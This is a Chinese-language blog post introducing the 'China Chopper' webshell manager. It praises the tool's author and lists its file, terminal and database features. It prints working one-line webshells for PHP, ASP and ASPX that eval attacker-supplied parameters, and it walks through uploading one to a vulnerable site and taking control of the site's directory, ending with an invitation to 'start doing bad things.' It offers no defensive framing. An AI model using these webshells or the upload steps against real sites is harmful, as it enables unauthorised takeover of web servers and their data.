龙空技术网

十大黑客工具之一——中国菜刀

网安情报站 64590

前言:

现时姐妹们对“一句话木马php菜刀”可能比较珍视,朋友们都想要剖析一些“一句话木马php菜刀”的相关文章。那么小编在网上搜集了一些对于“一句话木马php菜刀””的相关知识,希望咱们能喜欢,朋友们一起来学习一下吧!

中国菜刀的由来:

说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了C++/J2ME/PHP/JSP/ASP.NET等等十数种计算机语言,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了"只有一个中国"的黑页,一举成名。

作者是一个朴实,低调的技术牛人,他这些年留下的作品很多,中国菜刀是他最新的一个作品,从他之前的作品WEBSHELL管理器的基础上修改而来,功能更加的强大。

中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!程序大小:214K,在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。

主要功能有:文件管理,虚拟终端,数据库管理。

1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;

2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)

3.数据库管理:[特色]图形界面,支持YSQL,MSSQL,ORACLE,INFOMIX,ACCESS

以入支持ADO方式连接的数据库。

只要往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。

什么是一句话木马?

一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下:

php:<?php @eval($_post['pass']);?>

asp:<%eval request ("pass")%>

aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

一句话木马的使用

以php一句话为例,我们可以直接将这些语句插入到网站的某个php文件上,或者直接创建一个新的文件,在文件里写入一句话木马,然后把文件上传到网站上即可。

假设有个智障网站有这样的漏洞:

我们把这个phpma.php上传上去后,打开中国菜刀,在空白处鼠标右键,选择"添加选项"

编辑相关参数,包括一句话木马所在的URL以及密码,最后点击"编辑" 。

在URL中选中目标网站,点击鼠标右键,选择"文件管理",就能看到网站的目录结构了 。

获取整个网站的目录,然后就可以开始做坏事了。

标签: #一句话木马php菜刀